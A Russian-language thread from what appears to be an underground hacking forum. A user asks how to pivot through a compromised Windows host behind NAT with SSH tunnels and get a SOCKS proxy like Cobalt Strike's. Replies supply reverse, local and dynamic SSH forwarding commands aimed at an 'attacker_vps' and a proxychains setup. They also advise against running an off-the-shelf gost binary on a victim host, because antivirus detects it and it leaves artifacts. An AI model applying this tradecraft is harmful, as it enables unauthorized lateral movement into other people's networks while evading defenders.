• XSS.stack #1 – первый литературный журнал от юзеров форума

Pivoting SSH pivoting

Отслеживать
yellow

yellow

(L3) cache
Забанен
Регистрация
26.10.2022
Сообщения
183
Решения
1
Реакции
132
Гарант сделки
2
Депозит
0.0004
Пожалуйста, обратите внимание, что пользователь заблокирован
Добрый день.
Подскажите как запивотится с виндовой тачки которая за NAT-ом путем создания ssh-туннеля.
Моя цель получить сокс такой же как при использывани кобы к примеру или rpivot, но используя ssh.

Я вытаскиваю 22 порт виндовой машины ( которая за натом ) наружу так -> ssh -R 8222:local_winserver_ip:22 root@attacker_vps -p 22

на attackervps : ssh -D 1080 localadmin@localhost -p 8222 <<-- но тут конект не выходит сделать мб файрвол хз думаю я скорее я сам чего то не то делаю.

output:
kex_exchange_identification: Connection closed by remote host

IIIIXX Pernat1y - гляньте пожалуйста, мб я где то ошибся.
зы - извините если не в ту ветку пост повесил
зы2 команды openssh на винде те же что и на nix-ах

Спасибо.
 
если не ошибаюсь в чистом виде на винде нет ssh сервера, есть только клиент. соответственно так не получится сделать - никто 22 порт не слушает. как вариант вижу поднимать wsl, ставить туда ssh сервер и уже его заворачивать в тоннель.
 
Немного не тот синтакс.

ssh -L 8888:192.168.1.90:3389 root@attacker_vps -p 22

Далее на attacker_vps 127.0.0.1:8888 будет проброс на нужный порт в локалке, в этом примере рдп. SSH сервер на винде при этом не нужен.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
kiloton сказал(а):
будет проброс на нужный порт в локалке, в этом примере рдп. SSH сервер на винде при этом не нужен.
мне нужен не проброс на одиного порта. а нужен динамический сокс через который я могу ходить на любой порт.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ft9zh1 сказал(а):
если не ошибаюсь в чистом виде на винде нет ssh сервера, есть только клиент. соответственно так
ошибаетесь. если не предустановленно то ставится через powerShell или через msi пакет
на win10 предустановленно.
learn.microsoft.com

Erste Schritte mit OpenSSH Server für Windows

Erfahren Sie, wie Sie Remotecomputer mithilfe des OpenSSH-Clients und des Servers für Windows installieren und eine Verbindung herstellen.
learn.microsoft.com
 
Тогда это динамический форворд. будет так:
ssh -D localhost:8888 -f -N root@attacker_vps -p 22. Далее на порту 8888 будет сокс в сетку, с динамическим портом. Единственное требование это OpenSSH >= 7.6.

На attacker_vps можно поднять ProxyChains,
/etc/proxychains4.conf
socks5 127.0.0.1 8888.

Ну или пустить любой софт через socksify.
 
Последнее редактирование:
yellow сказал(а):
ошибаетесь. если не предустановленно то ставится через powerShell или через msi пакет
на win10 предустановленно.
learn.microsoft.com

Erste Schritte mit OpenSSH Server für Windows

Erfahren Sie, wie Sie Remotecomputer mithilfe des OpenSSH-Clients und des Servers für Windows installieren und eine Verbindung herstellen.
learn.microsoft.com
спасибо за информацию
 
kerberos сказал(а):
Самый простой спосом это gost
github.com/ginuerzh/gost
одно ехе решает все проблемы...

VirusTotal

VirusTotal
www.virustotal.com

Как бы, из коробки с гх без рекомпиляции и чистки его использовать на чужом хосте очень дикая идея.
Да и зачем артефакты лишние за собой оставлять, когда можно работать чисто.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
kerberos сказал(а):
github.com/ginuerzh/gost
одно ехе решает все проблемы...
это если только в лабе тестовой или на HTB.
Даже домашние ав уже агрятся на него, я уже не говорю про софос и прочих.
kerberos сказал(а):
Самый простой спосом это gost
И для динамического порт форваринга нужно запускать два госта - этого у них в доке не описано.
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
kiloton сказал(а):
Тогда это динамический форворд. будет так:
перед этим нужно порт вытащить 22. тк таргет за нат-ом, про это тс писал.
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх